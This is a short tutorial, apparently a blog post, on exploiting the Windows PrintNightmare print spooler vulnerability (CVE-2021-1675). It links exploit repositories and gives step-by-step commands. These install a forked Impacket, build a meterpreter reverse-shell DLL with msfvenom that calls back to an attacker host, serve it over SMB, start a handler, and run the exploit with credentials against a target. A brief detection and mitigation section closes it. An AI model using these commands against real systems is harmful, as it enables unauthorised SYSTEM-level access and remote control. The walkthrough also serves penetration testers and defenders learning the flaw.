Print Nightmare CVE-2021-1675

sweps

This is a remote code execution vulnerability released on June 1st 2021. The exploit takes advantage of the print spooler running as system and allows remote code execution as System user. The exploit does require valid user credentials which makes this an excellent windows privilege escalation tool to add to your arsenal.

For Linux:
https://github.com/cube0x0/CVE-2021-1675

Powershell:
https://github.com/calebstewart/CVE-2021-1675

Microsoft has released a patch to mitigate against these attacks but if these values below are present on a machine, then the machine will still be vulnerable

REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
RestrictDriverInstallationToAdministrators REG_DWORD 0x0
NoWarningNoElevationOnInstall REG_DWORD 0x1

Impacket also provides a tool for remote testing. If this tool returns either of the below Protocol results then it could be vulnerable.

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
    Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
    Protocol: [MS-RPRN]: Print System Remote Protocol

The exploit requires the latest version of Impacket.

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Before executing the payload against the remote target we need three things:

  1. Payload to run as System once the exploit has completed. Easiest to just create reverse shell with msfvenom
  2. SMB share on our machine hosting the payload
  3. Handler to catch the meterpreter shell (If we used a meterpreter payload)

Create Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.240 LPORT=4444 -f dll > shelly.dll

Setup SMB Share

smbserver.py share `pwd`  Note: pwd sets our current working directory as the shared directory. "share" is the name of the share and can be anything

Start Multi Handler in msfconsole

use multi handler
set payload windows/x64/meterpreter/reverse_tcp

Execute the payload

python3 CVE-2021-1675.py pwnme.local/smarsh:Password1@192.168.1.50 '\\192.168.1.240\share\shelly.dll'

Mitigation

Disable Spooler service

Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f